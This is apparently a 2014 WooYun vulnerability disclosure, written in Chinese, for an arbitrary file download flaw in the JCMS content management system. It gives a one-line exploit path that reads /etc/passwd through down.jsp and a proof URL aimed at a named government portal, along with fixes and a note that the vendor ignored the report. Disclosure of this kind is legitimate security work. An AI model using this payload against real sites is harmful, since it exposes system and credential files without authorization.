[公开漏洞]大汉网络JCMS任意文件下载

大汉网络JCMS任意文件下载 相关厂商： 南京大汉网络有限公司 漏洞作者：矿主 提交时间：2014-03-30 15:51 公开时间：2014-06-25 15:52 漏洞类型：任意文件遍历/下载 危害等级：高 自评Rank：20 漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞 漏洞来源：http://www.wooyun.org Tags标签： 无 漏洞详情 披露状态：

2014-03-30：细节已通知厂商并且等待厂商处理中
2014-03-31：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-04-07：细节向核心白帽子及相关领域专家公开
2014-04-17：细节向普通白帽子公开
2014-05-07：细节向实习白帽子公开
2014-06-25：细节向公众公开

简要描述：

绝对路径文件下载的问题。

详细说明：

通过分析代码，某个下载功能没有限制权限，没有限制下载类型，通过设置绝对路径的参数，直接下载。



漏洞利用：

jcms\m_1_9\user\down.jsp?abspathfile=/etc/passwd

漏洞证明：

测试代码：

http://www.njgl.gov.cn/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd



鼓楼区政府门户网站：

下载文件内容：

修复方案：

1.限制访问权限；

2.限制下载路径和文件类型；

版权声明：转载请注明来源 矿主@乌云 漏洞回应 厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-03-31 09:59

厂商回复：

感谢关注，该漏洞之前已经在其他安全平台提交过了。

最新状态：

暂无